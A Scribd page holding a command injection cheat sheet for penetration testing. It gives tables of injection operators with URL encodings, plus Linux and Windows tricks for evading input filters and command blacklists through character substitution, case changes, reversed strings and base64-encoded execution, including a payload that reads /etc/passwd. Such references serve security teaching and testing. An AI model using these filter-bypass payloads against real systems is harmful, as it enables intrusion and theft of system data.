Scribd Logo
Upload

Welcome to Scribd!

  • 17 views

    Command Injection Cheatsheet

    Uploaded by

    Anonymous (Akcent Hoong)
    This document summarizes injection operators and techniques for bypassing input filters and executing blacklisted commands on Linux and Windows systems. It provides tables listing common injection characters, examples of using special characters and environment variables to bypass filters on spaces and other characters, and methods for encoding, reversing, or manipulating the case of commands to evade blacklisting.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content

    You might also like

    Command Injection Cheatsheet

    Uploaded by

    Anonymous (Akcent Hoong)
    17 views2 pages
    This document summarizes injection operators and techniques for bypassing input filters and executing blacklisted commands on Linux and Windows systems. It provides tables listing common injection characters, examples of using special characters and environment variables to bypass filters on spaces and other characters, and methods for encoding, reversing, or manipulating the case of commands to evade blacklisting.

    Original Description:

    Original Title

    command_injection_cheatsheet

    Copyright

    © © All Rights Reserved

    Available Formats

    TXT, PDF, TXT or read online from Scribd

    Did you find this document useful?

    Is this content inappropriate?

    Report this Document
    This document summarizes injection operators and techniques for bypassing input filters and executing blacklisted commands on Linux and Windows systems. It provides tables listing common injection characters, examples of using special characters and environment variables to bypass filters on spaces and other characters, and methods for encoding, reversing, or manipulating the case of commands to evade blacklisting.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    17 views2 pages

    Command Injection Cheatsheet

    Uploaded by

    Anonymous (Akcent Hoong)
    This document summarizes injection operators and techniques for bypassing input filters and executing blacklisted commands on Linux and Windows systems. It provides tables listing common injection characters, examples of using special characters and environment variables to bypass filters on spaces and other characters, and methods for encoding, reversing, or manipulating the case of commands to evade blacklisting.

    Copyright:

    © All Rights Reserved
    Download as TXT, PDF, TXT or read online from Scribd
    Flag for inappropriate content
    Download as txt, pdf, or txt
    of 2

    ## Injection Operators

    | **Injection Operator** | **Injection Character** | **URL-Encoded Character** |


    **Executed Command** |
    |-|-|-|-|
    |Semicolon| `;`|`%3b`|Both|
    |New Line| `\n`|`%0a`|Both|
    |Background| `&`|`%26`|Both (second output generally shown first)|
    |Pipe| `\|`|`%7c`|Both (only second output is shown)|
    |AND| `&&`|`%26%26`|Both (only if first succeeds)|
    |OR| `\|\|`|`%7c%7c`|Second (only if first fails)|
    |Sub-Shell| ` `` `|`%60%60`|Both (Linux-only)|
    |Sub-Shell| `$()`|`%24%28%29`|Both (Linux-only)|

    ---
    # Linux

    ## Filtered Character Bypass

    | Code | Description |
    | ----- | ----- |
    | `printenv` | Can be used to view all environment variables |
    | **Spaces** |
    | `%09` | Using tabs instead of spaces |
    | `${IFS}` | Will be replaced with a space and a tab. Cannot be used in sub-shells
    (i.e. `$()`) |
    | `{ls,-la}` | Commas will be replaced with spaces |
    | **Other Characters** |
    | `${PATH:0:1}` | Will be replaced with `/` |
    | `${LS_COLORS:10:1}` | Will be replaced with `;` |
    | `$(tr '!-}' '"-~'<<<[)` | Shift character by one (`[` -> `\`) |

    ---
    ## Blacklisted Command Bypass

    | Code | Description |
    | ----- | ----- |
    | **Character Insertion** |
    | `'` or `"` | Total must be even |
    | `$@` or `\` | Linux only |
    | **Case Manipulation** |
    | `$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")` | Execute command regardless of cases |
    | `$(a="WhOaMi";printf %s "${a,,}")` | Another variation of the technique |
    | **Reversed Commands** |
    | `echo 'whoami' \| rev` | Reverse a string |
    | `$(rev<<<'imaohw')` | Execute reversed command |
    | **Encoded Commands** |
    | `echo -n 'cat /etc/passwd \| grep 33' \| base64` | Encode a string with base64 |
    | `bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)` | Execute b64
    encoded string |

    ---
    # Windows

    ## Filtered Character Bypass

    | Code | Description |
    | ----- | ----- |
    | `Get-ChildItem Env:` | Can be used to view all environment variables -
    (PowerShell) |
    | **Spaces** |
    | `%09` | Using tabs instead of spaces |
    | `%PROGRAMFILES:~10,-5%` | Will be replaced with a space - (CMD) |
    | `$env:PROGRAMFILES[10]` | Will be replaced with a space - (PowerShell) |
    | **Other Characters** |
    | `%HOMEPATH:~0,-17%` | Will be replaced with `\` - (CMD) |
    | `$env:HOMEPATH[0]` | Will be replaced with `\` - (PowerShell) |

    ---
    ## Blacklisted Command Bypass

    | Code | Description |
    | ----- | ----- |
    | **Character Insertion** |
    | `'` or `"` | Total must be even |
    | `^` | Windows only (CMD) |
    | **Case Manipulation** |
    | `WhoAmi` | Simply send the character with odd cases |
    | **Reversed Commands** |
    | `"whoami"[-1..-20] -join ''` | Reverse a string |
    | `iex "$('imaohw'[-1..-20] -join '')"` | Execute reversed command |
    | **Encoded Commands** |
    | `[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))` |
    Encode a string with base64 |
    | `iex "$
    ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBo
    AG8AYQBtAGkA')))"` | Execute b64 encoded string |

    You might also like